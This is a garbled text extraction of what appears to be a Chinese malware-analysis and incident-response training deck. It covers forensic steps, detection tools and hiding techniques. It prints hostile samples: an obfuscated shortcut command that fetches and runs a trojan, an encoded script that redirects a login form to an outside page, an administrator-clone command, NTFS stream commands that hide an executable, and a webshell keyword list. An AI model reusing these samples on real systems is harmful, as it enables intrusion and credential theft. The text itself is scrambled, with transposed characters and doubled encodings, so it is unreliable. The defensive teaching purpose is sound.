惡意程序病毒解析訓(xùn)練

惡意程序病毒解析訓(xùn)練目錄事故現(xiàn)場(chǎng)作業(yè)程序

本機(jī)網(wǎng)絡(luò)分析

系統(tǒng)活動(dòng)分析

檔案分析

動(dòng)態(tài)程序查找

一般的查找方式

一般的查找工具

靜態(tài)木馬檢查

木馬防查殺的目標(biāo)

進(jìn)階的躲藏方式

其他資安系統(tǒng)記錄

植入原因推測(cè)

問題與流程討論事故現(xiàn)場(chǎng)作業(yè)程序異?，F(xiàn)象回報(bào)

監(jiān)控通報(bào)

發(fā)現(xiàn)不允許的特定連線b

發(fā)現(xiàn)內(nèi)部主機(jī)在進(jìn)行掃瞄

數(shù)據(jù)庫(kù)稽核記錄異常

主機(jī)或網(wǎng)絡(luò)無(wú)法正常提供服務(wù)使用者感覺第三方回報(bào)

資料外泄

網(wǎng)站被置換或植入程序

犯罪調(diào)查

較難感覺到

ARP木馬熒幕上出現(xiàn)不正常自動(dòng)操作網(wǎng)絡(luò)變慢，開機(jī)久且會(huì)跳錯(cuò)誤訊息緊急應(yīng)變的事故成因

惡意攻擊

漏洞入侵(網(wǎng)站服務(wù)器、AP主機(jī))b資料非經(jīng)授權(quán)竊取資(料庫(kù)服務(wù)器、AD主機(jī))

DoS或DDoS

后門

、木馬或病毒

人為點(diǎn)擊電(子郵件、網(wǎng)頁(yè)瀏覽、偽裝盜版程序破/解

軟件社交攻擊)自動(dòng)散布(網(wǎng)芳擴(kuò)張)

資料遭竄改或刪除

盜竊或勒贖(Ransomware

、Sniffer)

其他單位通知跳板(Command-and-Control)事故影響等級(jí)不重要的系統(tǒng)中斷重要系統(tǒng)受影響且造成服務(wù)質(zhì)量降低重要系統(tǒng)無(wú)法運(yùn)作影響范圍大或短期間發(fā)生頻繁的事故

C&C或犯罪調(diào)查事故存證：未來具法庭需求，或計(jì)算機(jī)犯罪等與惡意程序

無(wú)關(guān)時(shí)（例如查密帳）

依證據(jù)標(biāo)準(zhǔn)備份事故環(huán)境

決定系統(tǒng)重新上線時(shí)間

使用備份環(huán)境的備份調(diào)查事故發(fā)生細(xì)節(jié)

媒體控制

法庭程序決定采取步驟依事故成因與影響等級(jí)判斷事故回復(fù)：先回復(fù)運(yùn)作為主

決定是否備份事故環(huán)境b將系統(tǒng)回復(fù)至前次正常狀態(tài)，完全破壞事證事故排除：無(wú)法直接還原，須在線排除決定是否備份事故環(huán)境

調(diào)查事故發(fā)生細(xì)節(jié)消滅事故成因，確認(rèn)系統(tǒng)正常運(yùn)作，可能破壞事證從哪里下手？

使用者以及管理者第一手觀察資料

系統(tǒng)

系統(tǒng)活動(dòng)記錄

系統(tǒng)環(huán)境

系統(tǒng)檔案，包含入侵殘留物程(序檔,

案)資安系統(tǒng)記錄與備份媒體網(wǎng)絡(luò)/通訊

網(wǎng)絡(luò)封包側(cè)錄記錄

其他資安系統(tǒng)記錄是是否進(jìn)行事件分析作業(yè)流程概觀填寫環(huán)境狀態(tài)歷程表分析目標(biāo)物件的類別檔

案

分析記錄分析網(wǎng)路活動(dòng)分析設(shè)定分析環(huán)境備份開始處理采證或復(fù)原系

統(tǒng)

活

動(dòng)

分

析事故通報(bào)否時(shí)間目標(biāo)物件位置關(guān)系人處理員描述注意*：記得要先對(duì)時(shí)注意***：各種資料來源的時(shí)區(qū)與時(shí)間格式都不同作業(yè)流程概觀環(huán)境狀態(tài)歷程表數(shù)位證據(jù)

利用特定技術(shù)，將事發(fā)現(xiàn)場(chǎng)所搜集的各種資料加以分析并找出可以被法庭律()采納的證據(jù)。

CSIRT專門負(fù)責(zé)調(diào)查和處理數(shù)位證據(jù)，

其主要工作包括：

搜集證據(jù)

(Collect)b檢驗(yàn)和分析證據(jù)

(Identify

and

Analyze)

保存證據(jù)

(Preserve)國(guó)際上鑒識(shí)流程范例犯罪證據(jù)搜證步驟數(shù)位鑒識(shí)調(diào)查參考資料

計(jì)劃名稱數(shù):位鑒識(shí)標(biāo)準(zhǔn)作業(yè)程序之實(shí)務(wù)及方法

研究賴-溪松教授

參考資料來源

.tw/bitstream/987654321/

3486/1/%E6%95%B8%E4%BD%8D%E9%9

1%91%E8%AD%98%E6%A8%99%E6%BA%96%E4%BD%9C%E6%A5%AD%E7%A8%8B%E5%BA%8F%E4%B9%8B%E5%AF%A6%E5%8B%99%E5%8F%8A%E6%96%

B9%E6%B3%95%E7%A0%94%E7%A9%B

6+%E6%9C%9F%E6%9C%AB%E5%A0%B

1%E5%91%8A.ppt網(wǎng)絡(luò)活動(dòng)分析分析目標(biāo)物件的類別!網(wǎng)絡(luò)分享列表↓網(wǎng)絡(luò)活動(dòng)分析更新環(huán)境狀態(tài)歷程表交付二線分析人員原始封包記錄緊急中斷程序/埠號(hào)列表流程新目標(biāo)物件封包側(cè)錄(不建議于本機(jī)安裝)WireShark(tcpdump)

SNORT(IDS)

KISMET(無(wú)線)封包分析相關(guān)網(wǎng)絡(luò)設(shè)備記錄

封包側(cè)錄儀(最好由旁路側(cè)錄)

防火墻(L較7佳，能夠記錄Application)

IPS

WAF適用于事件還在發(fā)生中，對(duì)于舊有事故通常沒

有存下完整記錄，難以追查運(yùn)氣好可透過封包分析完整記錄到攻擊、感染、

遠(yuǎn)遙過程，以及得知攻擊者身份●

Network

Discover

類似安全稽核，不建議由網(wǎng)絡(luò)發(fā)起主動(dòng)探尋封包分析(Sniffer)

NetWitness

NIKSUN

NetDetector

Sandstorm

NetIntercept

流量分析b

ntop

MRTG/PRTG、Cacti

IDS/IPSb

Flow

based

monitor

DatabaseAuditing商用網(wǎng)絡(luò)鑒識(shí)工具HTTPAttack

SSLAttackFTPfrom

Intranet

SMTPfrom

Intranet

SQLQueryNon-httptrafficon

80/443

portSniffer分析目標(biāo)本機(jī)網(wǎng)絡(luò)活動(dòng)觀察

ipconfig

本機(jī)連線狀態(tài)

b

netstat

-nba

Tcpview/TCPLogView

Currports

b

fport網(wǎng)絡(luò)芳鄰活動(dòng)b

netshare

←

→

netsession

←

→openfiles

net

use內(nèi)建指令net家族

net

localgroup

netgroup(網(wǎng)域控制站)net

share

net

startnet

session

net

usenetviewnet

user后門連線分析練習(xí)

程序占用埠號(hào)當(dāng)前連線狀態(tài)網(wǎng)絡(luò)分享緊急中斷網(wǎng)絡(luò)分享

原始封包側(cè)錄參考資料

Computer

Forensics:

InvestigatingNetwork

Intrusionsand

CyberCrime25練習(xí)

Snapshop當(dāng)前干凈的VM

檢查以下程序的網(wǎng)絡(luò)狀態(tài)

b

setop.exe

a

ppmgmt.exe

biapple.exe

檢查目的程序占用埠號(hào)當(dāng)前連線狀態(tài)

網(wǎng)絡(luò)分享setop.exe

檔案：

C:\WINNT\svchost.exe機(jī)碼值：

HKLM\SOFTWARE\Microsoft\Windows\Curr

entVersion\Run\System網(wǎng)絡(luò)活動(dòng)：b試圖連到1:52(

140.136.25.2:52)

Whois信息：輔仁大學(xué)appmgmt.exe網(wǎng)絡(luò)活動(dòng)：b

DNS查詢

連往00:80b

whois信息：美國(guó)(原本位于湖北省)biapple.exe

檔案：

C:\WINNT\svchost.exeb

C:\WINNT\system32\msextapi.dllb

C:\WINNT\system32\msrascfg.ini機(jī)碼值

：

HKLM\SOFTWARE\Microsoft\Windows\Curr

entVersion\Run\GameServer

Browser

Help

Objects網(wǎng)絡(luò)活動(dòng)：b

DNS查詢r(jià)abbi.bi-apple.netInternet反向式木馬案例潛伏期www.hacker.net

跳板機(jī)2

跳板機(jī)3使用者

AD

Serverwww.hacker.netHacker

ServerDNSServer跳板機(jī)1大陸黑客IntranetFirewallDNSRouterDMZInternet活動(dòng)期一www.hacker.net使用者

AD

Server反向式木馬案例(續(xù))www.hacker.net

跳板機(jī)2Hacker

DNSServerwww.hacker.netDNSServer跳板機(jī)3跳板機(jī)1大陸黑客IntranetFirewallRouterDMZRemote

ControlIntranet反向式木馬案例(續(xù))www.hacker.net跳板機(jī)3活動(dòng)期二使用者

AD

Server反向連接:80跳板機(jī)2Hacker

DNS

Server攻擊內(nèi)

部機(jī)器DNSServerInternet

Remote

Control跳板機(jī)1大陸黑客FirewallRouterDMZ系統(tǒng)活動(dòng)分析交付二線分析人員使用者與群組

列表系統(tǒng)環(huán)境分析目標(biāo)物件的類別系統(tǒng)信息收集更新環(huán)境狀態(tài)歷程表緊急變更設(shè)定分析開機(jī)時(shí)程序與

排定的工作

機(jī)碼值

新目標(biāo)物件dir/a/s/bregedit/regedt32.exereg/regdmp.exesc.exequery

bufsize=

10000

netshdiag

showall/v

(old)netsh

dumproute

printgpresultset基本記錄工具

cmd內(nèi)建指令net家族

net

localgroup

netgroup(網(wǎng)域控制站)net

share

net

startnet

session

net

usenetviewnet

user使用者躲藏

常見的使用者躲藏方式

無(wú)法列表的使用者

修改現(xiàn)有使用者權(quán)限相關(guān)工具

net

user

PsGetSid

user2sid

sid2user

aio

Cca

HideAdmin隱藏的使用者

無(wú)法列表的使用者b

在AD環(huán)境下，hostname$則是各主機(jī)的計(jì)算機(jī)注冊(cè)賬號(hào)，登入時(shí)執(zhí)行身份為NETWORK

SERVICE

結(jié)尾帶有

本機(jī)使用者名稱

，也會(huì)讓W(xué)indow認(rèn)s為它是計(jì)算機(jī)賬號(hào)b使用

net

user看不到

修改現(xiàn)有使用者權(quán)限克(隆賬號(hào))b讓新賬號(hào)與內(nèi)建賬號(hào)(administrator,guest的)

SID相同aio.exe

aio-cloneadministratorguest

123456

用guest/

123456登入，成為administratoraio.exe難以察覺克隆賬號(hào)查找法

aio–checkclonecca\\主機(jī)

administator

密碼

GuestDeleteGues刪t除大師克隆賬號(hào)查找法

–回避查找建一個(gè)管理者賬號(hào)clone該賬號(hào)

刪除該賬號(hào)SAM里的FV(不要用netdelete)克隆賬號(hào)查找法

2

Reged32.ex改e權(quán)限\\HKEY

LOCAL

MACHINE\SAM\SAM克隆賬號(hào)查找法

2(續(xù))

Regedit\\HKEY

LOCAL

MACHINE\SAM\SAM\Domains\Account\Users看誰(shuí)的F值跟administrators一樣克隆賬號(hào)查找

–風(fēng)險(xiǎn)

有經(jīng)驗(yàn)的黑客會(huì)取消

administrators對(duì)這些機(jī)碼的讀寫權(quán)限\\HKEY

LOCAL

MACHINE\SAM\SAM\\HKEY

LOCAL

MACHINE\SAM\SAM\Domains\Account\Users

無(wú)法讀寫或修改權(quán)限時(shí)，可以確認(rèn)主機(jī)已經(jīng)遭到攻擊練習(xí)回復(fù)到干凈VM

收集使用者狀態(tài)

檢查以下程序的使用者狀態(tài)

useradd.bat

檢查目的

比對(duì)使用者狀態(tài)Event

Log

Evt(WindowsXP/2003)

、Evtx(Windows

7/2008

Application

Security

System建議事先開啟檔案稽核

修改安全性原則Event

Log常見搜查目標(biāo)

調(diào)整時(shí)間值(SecurityEvent

ID520)

超過1天

讀寫

C$,D$,

E$的..事件

(Security

Event

ID

5140)

程序執(zhí)行失敗，例如安裝核心驅(qū)動(dòng)程序失

敗(System

Event

ID7045)

登入遠(yuǎn)端RDP失敗(SystemEvent

ID

10006)

指定的目錄被寫入檔案●Event

ID5140b列出所有讀寫

C$,

D$,

E$的..事件，串查登

入主機(jī)當(dāng)時(shí)的所有登入者遠(yuǎn)端讀寫檔案登入桌面

列出遠(yuǎn)端登入桌面的來源和使用賬號(hào)

Application

event

ID

:4001登入事件，但正常事件可能很多，難以區(qū)分相關(guān)事件

Application

event

ID

:9003DWM(DesktopWindow

Manager啟)動(dòng)失敗，代表有登入桌面

Application

event

ID

:9009

DWM結(jié)束

Systemevent

ID:7001客戶經(jīng)驗(yàn)改進(jìn)通知，代表有登入桌面練習(xí)回復(fù)到干凈VM匯入Event

Log

檢查遠(yuǎn)端存取事件環(huán)境信息搜集

常用搜集小工具

HijackThis顯-示常被惡意植入的目標(biāo)設(shè)定

b

autoruns–顯示會(huì)隨開機(jī)自動(dòng)啟動(dòng)的程序

b

msconfig–顯示開機(jī)設(shè)定檔案分析--動(dòng)動(dòng)態(tài)程序查找開啟服務(wù)執(zhí)行中程式清單緊急停止交付二線分析人員分析目標(biāo)物件的類別動(dòng)態(tài)程序查找!執(zhí)行中DLL清單↓系統(tǒng)活動(dòng)分析更新環(huán)境狀態(tài)歷程表新目標(biāo)物件!一銀ATM盜領(lǐng)案一般查找的可疑目標(biāo)

檔案與服務(wù)的名稱

檔案與服務(wù)的版本與描述

檔案時(shí)間

網(wǎng)絡(luò)埠執(zhí)行中程式與狀態(tài)列表執(zhí)行中DLL與狀態(tài)列表已開啟服務(wù)狀態(tài)列表一般查找方式

常用自動(dòng)工具

SysInternals

(Microsoft)-Process

Explorer-Process

Monitor-Pstools

Suite

NirSoftTools

IceSword

Wsyscheck

HookExplorer、ArchonAntiAPIHook、Ring3

APIHookScanner

tasklist/M、listdlls–檢視dll載入狀態(tài)

WhatsHappening–顯示執(zhí)行中的行程Process

Explorer

檢視當(dāng)前行程狀態(tài)Process

Monitor結(jié)合兩種監(jiān)控工具

Filemon–檢視檔案讀寫狀態(tài)

RegMon–檢視登錄值讀寫狀態(tài)SysInternals

常用

PSTools

Suite

Autoruns

ProcessExplorer

Process

Monitor

(FileMon+RegMon)

TCPViewPsExec–

遠(yuǎn)端執(zhí)行程序PsFile–顯示被遠(yuǎn)端開啟的檔案PsGetSid–顯示主機(jī)或使用者的SIDPsKill–移除程序行程

PsInfo–檢視系統(tǒng)信息

PsList–檢視程序行程PsLoggedOn–檢視本機(jī)與遠(yuǎn)端登入者

PsLogList–傾印事件檢視器記錄PsPasswd–修改賬號(hào)密碼PsService–檢視與控制服務(wù)PsShutdown–關(guān)閉主機(jī)

PsSuspend–暫停行程Pstools

工具包API

Hook

一般程序會(huì)呼叫系統(tǒng)API進(jìn)行工作。Hook

就是在呼叫系統(tǒng)AP前I，先讓程式呼叫到

惡意函數(shù)，執(zhí)行完后再跳回系統(tǒng)API繼續(xù)

動(dòng)作。

最基本的HookUser32.dll：HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Windows\Appinit

DllsSSDT

SystemServices

DescriptorTable

Ring0區(qū)，儲(chǔ)存各函數(shù)的位址可用以攔截Window的s操作。防毒程序經(jīng)常利用攔截

病毒，惡意程序經(jīng)常利用躲避調(diào)查?！馭SDT

Hook

原本使用ntoskrnl.exe執(zhí)行的操作，被第三方程序介

入，亦即把位址改成自己，處理完再丟回給ntoskrnl.exe

INLINE

SSDT

HOOK

不是改對(duì)應(yīng)位置，是改函數(shù)本身，先跳轉(zhuǎn)自己，處理

完再丟回

Rootki例t：NtDeleteFile

Hook–

防殺FSD

檔案系統(tǒng)驅(qū)動(dòng)程序(FileSystem

Driver)例：FileSystem

Filter

Driver：防毒、加解密

、

檔案讀寫監(jiān)控

FSD

Inline

Hook

讀寫檔案時(shí)先經(jīng)過惡意

程序處理WsyscheckWsyscheckWsyscheckWsyscheck

檢查IE會(huì)帶起的選項(xiàng)HookExplorer練習(xí)回復(fù)到干凈VM重新檢查下列程序的系統(tǒng)

狀態(tài)

b

setop.exe

biapple.exe

檢查目的

找出新增檔案

找出新增服務(wù)

比對(duì)機(jī)碼值

比對(duì)其他系統(tǒng)狀態(tài)的變更setop.exe

檔案：

C:\WINNT\svchost.exe機(jī)碼值：

HKLM\SOFTWARE\Microsoft\Windows\Curr

entVersion\Run\System網(wǎng)絡(luò)活動(dòng)：b試圖連到1:52(

140.136.25.2:52)

Whois信息：輔仁大學(xué)biapple.exe

檔案：

C:\WINNT\svchost.exeb

C:\WINNT\system32\msextapi.dllb

C:\WINNT\system32\msrascfg.ini機(jī)碼值

：

HKLM\SOFTWARE\Microsoft\Windows\Curr

entVersion\Run\GameServer

Browser

Help

Objects網(wǎng)絡(luò)活動(dòng)：b

DNS查詢r(jià)abbi.bi-apple.net程序分析

-Winalysis程序分析

-Winalysis程序分析

-Winalysis練習(xí)回復(fù)到干凈VM重新檢查下列程序的系統(tǒng)

狀態(tài)

b

fswall.exe

FILE

101.exe

檢查目的

找出新增檔案

b

找出新增服務(wù)

比對(duì)機(jī)碼值

比對(duì)其他系統(tǒng)狀態(tài)的變更

練習(xí)移除程序fswall.exe

檔案：b

C:\WINNT\system32\dump48.exe(偽裝微軟)

C:\WINNT\system32\kazaabackupfile\*.*機(jī)碼值

：

HKLM\SOFTWARE\Microsoft\Windows\Curr

entVersion\Run\Dump

System

Debug

and

Control透過Kazaa散布惡意程序FILE_101.exe檔案：bC:\WINNT\system32\ntdvrlib.dll

C:\WINNT\system32\SCSrv.dllbC:\Documentsand

Settings\Administrator\Local

Settings\Temp\Del*.tmp

服務(wù)：

Script

Client

Service(WorkStation服務(wù)依存)網(wǎng)絡(luò)活動(dòng)

DNS查詢view1.j2ee.us、view2.j2ee.us

連到1863/TCP程序分析

-AntiVirus

例

：VirusTotal程序分析

–OnlineSandbox

Service80/automated-malware-analysis/程序分析

–OnlineSandbox

Service81練習(xí)回復(fù)到干凈VM重新檢查下列程序的執(zhí)行結(jié)果態(tài)

b

iisdoor.exe

msnchecker.exe

rescue_system-common-en.exe

b

Checkand

Getv1.14.zip

CheckAnd

Getv1.8.70.zip檔案分析--靜態(tài)檔案檢查檔案?jìng)浞纸桓抖€分析人員緊急移除相關(guān)檔案搜尋可疑檔案搜尋↓檔案分析

新目標(biāo)物件分析目標(biāo)物件的類別靜態(tài)檔案檢查更新環(huán)境狀態(tài)歷程表記錄檔案屬性靜態(tài)尋找尋找可疑檔案

在不執(zhí)行惡意程序的情況下進(jìn)行分析對(duì)非二進(jìn)制格式檔案可直接檢視

對(duì)二進(jìn)制格式檔案進(jìn)行先期處理

分析工具利用光盤執(zhí)行分析工具以非安裝檔為主PE格式

PE(Portable

Executable)可移植式執(zhí)行檔：可在所有

Microsoft32位元作業(yè)系統(tǒng)中執(zhí)行的檔案，相同的

PE格式檔案可在任何版本的

Windows95、98、Me、NT與

2000

上執(zhí)行

。

標(biāo)頭為4D5A(MZ)。

常用附檔名：exe、dll，但可使用.gif等其

他檔名偽裝。檔案搜尋與分析–二進(jìn)制格式檔案檢視是否為PE格式檔案檔案屬性、大小、版本等檢視檔案的可讀字符

tree-檔案列表BinaryTextScan可-讀字符內(nèi)容fciv.exe

、md5sum-檔案檢查碼ff.exe-檔案尋找與比對(duì)xcopy.exe-檔案?jìng)浞?/p>

Rootkit搜尋

AntiVirus、AntiTrojan(不建議在原始證據(jù)或在線系統(tǒng)執(zhí)行)ForensicToolkit20

AFind–找出檔案上次存取時(shí)間，不會(huì)修改屬性

Audited–找出受稽核的檔案

DACLchk.exe–找出所有可供全部使用者存取的檔案。FileStat–

快速列出檔案屬性HFind–找出所有隱藏檔及其上次存取時(shí)間Hunt–

快速列出現(xiàn)有分享資源SFind–找出所有隱藏資料流及其上次存取時(shí)間加殼與剝殼

PE檔案的加殼/剝殼機(jī)制–Aspack–ASProtect–

Petite–

PECompact–

Neolite–

Shrinker

–

Upx…

萬(wàn)用撥殼機(jī)Ollydbg、ProcDump32、PeiDPeidMalewareAnalyzer

http://malwareanalyser.blogspot.com/練習(xí)回復(fù)到干凈VM列出

Virus目錄下的加殼程序網(wǎng)頁(yè)木馬的植入點(diǎn)(非二進(jìn)制檔)檔案植入(html,

jsp,asp,asa,

php,vbs)b網(wǎng)頁(yè)后門新檔、腳本程序碼：

html、jsp

、

asp、php、vbs…

等可疑的文件或批次檔：txt、cfg、ini、bat

…

等變更舊有程序上傳目錄ISAP置I換：%systemroot%\system32\inetsrv\/test.asp或//test.aspx或//test.asa/目錄下所

有檔案都視為可執(zhí)行

數(shù)據(jù)庫(kù)植入

留言版

交互式功能網(wǎng)頁(yè)木馬查找

工具檢查

與原本檔案清單比對(duì)

bff.exe依時(shí)間查找

網(wǎng)絡(luò)安全衛(wèi)士(效用較差，但方便列出副檔名)雷客圖ASP站長(zhǎng)安全助手

思易ASP木馬追捕

、淘特

手工核對(duì)

asacer

cdx

stm

shtml檔案

ISAP中I

網(wǎng)頁(yè)目錄下屬性為H的檔案或目錄

不一定能在在線檢查

不保證能全部找到自己撰寫findshell網(wǎng)絡(luò)安全衛(wèi)士雷客圖

指令b

cscript

[安裝目錄\Scan.vbs]

目[標(biāo)目錄]報(bào)[表

目錄\Report.html]b例：cscriptScan.vbsc:\InetPubC:\Report.html雷客圖手工核對(duì)(1)

常用的Javascript內(nèi)嵌碼

Iframe

src=“http

<bodyonloadbwidth小于10，或height小于10b

中"間有帶或(或)@“可疑但容易誤判的b

document系列，例如document.write

b新視窗系列，

window.openb

"http，特別是src=""及,onLoad=""手工核對(duì)(1)-兩種躲藏的范例

<ahref=".tw@1208929129">ADMIN

LOGIN</A>

<script>www

=

newobj1();functionobj1(){this.google=newobj2;}functionobj2(){=obj3;}functionobj3(){open("http://.tw@1208929129","NewWindow","toolb

ar=no,location=no,directories=no,status=no,menubar=no,scrollbar

s=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,

top=10");}</script><span

id="1"onclick="www.google.com();">TEXT<span>eval(escape(unescape(encodeURI(encodeURIComponent(jscript.encodejavascript.encodevbscript.encodeexpression(手工核對(duì)(2)-Script木馬

回避明碼檢查手工核對(duì)(2)-編碼后的范例

%3c%3d%2522%253e%253cscript%3eeval(unescape(%2522%2

52564%25256F%252563%252575%25256D%252565%25256E%252574%25252E%252567%252565%252574%252545%25256C%252565%25256D%252565%25256E%252574%252573%252542%252579%25254E%252561%25256D%252565%252528%252522%25256C%25256F%252567%252569%25256E%25255F%252566%25256F%252572%25256D%252522%252529%25255B%252530%25255D%25252E%252561%252563%252574%252569%25256F%25256E%25253D%252522%252568%252574%252574%252570%25253A%25252F%25252F%252577%252577%252577%25252E%25257A%252575%252573%25256F%25252E%25256F%252572%252567%25252E%252574%252577%25252F%252564%252565%25256D%25256F%25252E%252570%252568%252570%252522%2522))%253c/script%253e%253cscript手工核對(duì)(2)解-碼wscriptsystem(,

shell

exec(

,

exec(

,

passthru(fopen,

popen,fread,fclose,fwrite,file

exists,

mkdir,

rmdir,

chmod,

unlink,closedir,

is

dir,

readdir.opendir,fileperms,

delfile「`

」php支援UNIX的跳脫執(zhí)行符號(hào)b例：echo`ls`;b即shell

exec()手工核對(duì)(3)–

網(wǎng)頁(yè)后門手工核對(duì)(4)–

SWF/RM掛馬swf掛馬針對(duì)已知/未知

flash

player漏洞

rm掛馬針對(duì)已知/未知

rm

player漏洞

比較實(shí)際的偵測(cè)方式

(1)

比對(duì)自有swf/rm檔案與原始檔是否被修改b

(2)

網(wǎng)頁(yè)中轉(zhuǎn)導(dǎo)或引用(src=http)到他站swf/rm檔的內(nèi)容

各種CLSID手工核對(duì)(5)–

urlsnooper

在沒有Lo的g情況下監(jiān)控頁(yè)面中的網(wǎng)址手工核對(duì)(6)–轉(zhuǎn)址掛馬目錄名稱帶有副檔名b*.asa目錄(直至2009年中才被公布)

b

jpg,

gif：-

.tw/show.jpg=>-

.tw/show.jpg/=>-

.tw/show.jpg/index.htm

404,500

Error轉(zhuǎn)導(dǎo)向目標(biāo)手工核對(duì)(7)–

Bookmark掛馬

偽裝的Bookmark可被用于

：

釣魚網(wǎng)站廣告頁(yè)面

XSS攻擊

DDoS攻擊手工核對(duì)(7)–

Bookmark掛馬修-改

url檔的篡改

url檔的篡改-基本設(shè)定

URL：目標(biāo)網(wǎng)址

WorkingDirectory：工作目錄bIconFile：圖示的取用來源，可以是ICO,

DLL或

EXE

IconIndex：圖示檔中第幾個(gè)

Modified：修改日期

ShowCommand：?jiǎn)?dòng)后的視窗大小，3最小，7最

大

HotKey：設(shè)定直接連向此網(wǎng)址的快速鍵手工核對(duì)(7)–

Bookmark掛馬修-改手工核對(duì)(7)–

Bookmark掛馬修-改

url檔的篡改-基本設(shè)定HotKey手工核對(duì)(7)–

Bookmark掛馬修-改

url檔的篡改-基本設(shè)定HotKey手工核對(duì)(7)–

Bookmark掛馬查-找

先檢查HKEY

CURRENT

USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserShell

Folder的s

Favorites位置手工核對(duì)(7)–

Bookmark掛馬查-找type*.url比對(duì)手工核對(duì)(7)–同類概念延伸啟始網(wǎng)頁(yè)：但常容易被發(fā)現(xiàn)

Proxy：不容易發(fā)現(xiàn)，但使用者會(huì)感覺變

慢/etc/hosts檔

：不容易發(fā)現(xiàn)附加DNS后綴：超不容易發(fā)現(xiàn)手工核對(duì)(7)–附加DNS后綴附加DNS后綴手工核對(duì)(7)–附加DNS后綴手工核對(duì)(8)–ARP

掛馬.Wireshark手工核對(duì)(9)–

IIS篩選器和MIMEdir*.aspx*.aspx/s

/b

>

filelist.txtfindstr/i/r/s/g:%cd%\shell.sig

/f:%cd%\filelist.txt

>%cd%\find

shell

result

.txtfindshell練習(xí)

檢查web目錄下哪些檔案可疑？

檢查ARP掛馬封包惡意程序防查殺基本的檔案躲藏方式

檔名偽裝，例如exp1orer.exe目錄偽裝，例如%SystemRoot%\system32\explorer.exe

屬性+S+

藏執(zhí)行時(shí)刪除自身

系統(tǒng)還原

取代現(xiàn)有檔案，例如dll掛馬練習(xí)回復(fù)到干凈VM重新檢查下列程序的系統(tǒng)

狀態(tài)

SoftHome.exe

SoftHome2.exe

檢查目的

找出新增檔案

找出新增服務(wù)

比對(duì)機(jī)碼值

比對(duì)其他系統(tǒng)狀態(tài)的變更SoftHome.exe

檔案：

C:\Program

Files\Internet

Explorer\svhost32.exeb

C:\WINDOWS\system32\mxdll.dll機(jī)碼值：

HKLM\SOFTWARE\Microsoft\Windows\Curr

entVersion\Run\mxSoftHome2.exe

檔案：

C:\Program

Files\svhost32.exe

C:\WINDOWS\system32\xwdll.dll機(jī)碼值

HKLM\Software\Microsoft\Windows\Current

Version\Run\xw進(jìn)階的躲藏方式

LNK捷徑檔驅(qū)動(dòng)程序

SystemVolume

Information

.結(jié)尾目錄

-結(jié)尾檔案

副檔名開啟

不可見字符副檔名

SupperHidden

ADS串流反向檔名

com1保留字資源回收筒

IFEO劫持

debug執(zhí)行

PATH路徑此例中，這串指令執(zhí)行了連接一個(gè)服務(wù)器

下載惡意程序(木馬程序)

執(zhí)行它！%ComSpec%/cseth=p-&set

j=ge&sets=.g03z.&echoechoowww%s%com^>t>b.bat&callb.bat&echoaa33>>t&echobb33>>t&echoecho

%j%tp

p.vbs^>^>t>>c&echoecho

bye^>^>t>>c&echoft%h%s:t>>c&echostart

p.vbs>>c&renc

h.bat&call

h.bat&捷徑是一串DOS指令的集合LNK捷徑檔o

setdevmgr

show

nonpresent

devices=1

裝置管理員(devmgmt.msc)->顯示隱藏裝

置驅(qū)動(dòng)程序查找SystemVolume

Information隱藏的系統(tǒng)資料夾，是「系統(tǒng)還原」工具

用來儲(chǔ)存其信息與還原點(diǎn)的地方，每一個(gè)

磁碟分割上都有一個(gè)預(yù)設(shè)賬號(hào)通常沒有權(quán)限瀏覽

檢查方式

：

b

mt.exe–sub

dir"C:\SystemVolume

Information“

正常來說應(yīng)該是空的，有東西就是有問題

使用mt.exe調(diào)查前應(yīng)先關(guān)閉防毒程序

若系統(tǒng)上本來就有mt.exe，有問題.結(jié)尾目錄dir后目錄結(jié)尾為「.」b

mdtest..或\mkdirtest..\

copy

hello.txt

"G:\ERS\test..\\hello.txt"

b無(wú)法直接刪除

無(wú)法使用搜尋找到

檢查法

startG:\ERS\test..\

b

rmdir

"test..\"-結(jié)尾檔案

檔名后結(jié)尾為「_」，為windows壓縮檔

如果是已知病毒，病毒的自動(dòng)防護(hù)會(huì)忽略，

要全系統(tǒng)掃毒時(shí)才有可能找到b

compress-Rfilename

檢查法

檔名尾巴但(檔名可變更)

SZDD格式b

expand–rfilename副檔名開啟機(jī)碼值中設(shè)定exefile="%1"%*

檢查b

assoc

|find

"exe"

ftype

|find

"exefile"b檢查所有副檔名開啟方式

反向利用抓自動(dòng)啟動(dòng)的后門

ftypeexefile="C:\recordexe.bat"

%1

b

ftypeexefile="%1"

%*其他副檔名

HKEY

LOCAL

MACHINE\Software\CLASSES\exefile\shell\open\command

\piffile\shell\open\command

\htafile\shell\open\command

\comfile\shell\open\command

\cmdfile\shell\open\command

\batfile\shell\open\command不可見字符副檔名

概念類似UNIX空格符目錄

ALT-小鍵盤，例如ALT-128中文全形「

」不可見字符可能可用d

r

出

中文全形較難以以dir查出不可見字符副檔名

–

比一比不可見字符副檔名中文全形「

」

MS-DOS模式不一定查出來SuperHidden

SuperHidden就是System+Hidden

修改機(jī)碼值強(qiáng)制不顯示系統(tǒng)屬性與隱藏屬

性檔案(需重開機(jī))b

HKLM\SOFTWARE\Microsoft\Windows\Curr

entVersion\Explorer\Advanced\Folder\Hidde

n\SHOWAL的L

CheckedValue被設(shè)為0，或型態(tài)不是REG

DWORD

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidde的n

CheckedValue被設(shè)為1SuperHidden

SuperHidden就是System+Hidden

修改機(jī)碼值強(qiáng)制不顯示系統(tǒng)屬性與隱藏屬

性檔案(需重開機(jī))b

HKLM\SOFTWARE\Microsoft\Windows\Curr

entVersion\Explorer\Advanced\Folder\Hidde

n\SHOWAL的L

CheckedValue被設(shè)為0，或型態(tài)不是REG

DWORD

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidde的n

CheckedValue被設(shè)為1SuperHiddenADS串流

ADS(Alternate

DataStream)：NTFS系統(tǒng)下可

以隱藏檔案，且顯示大小不變，常被惡意利用。

寫入-

typetest2.exe>test1.txt:test2.exe

執(zhí)行-

start

D:\test1.txt:test2.exe刪除-

typetest1.txt>test1-clean.txt-或把檔案copy到非NTFS系統(tǒng)

搜尋-

ADSSpy、Afind.exe

Kaspersky用這種方式作檔案檢查，所以搜尋時(shí)

會(huì)造成誤判。反向檔名反向檔名

Unicode字符檔名

LEFT-TO-RIGHT

OVERRIDE(U+202D)

RIGHT-TO-LEFT

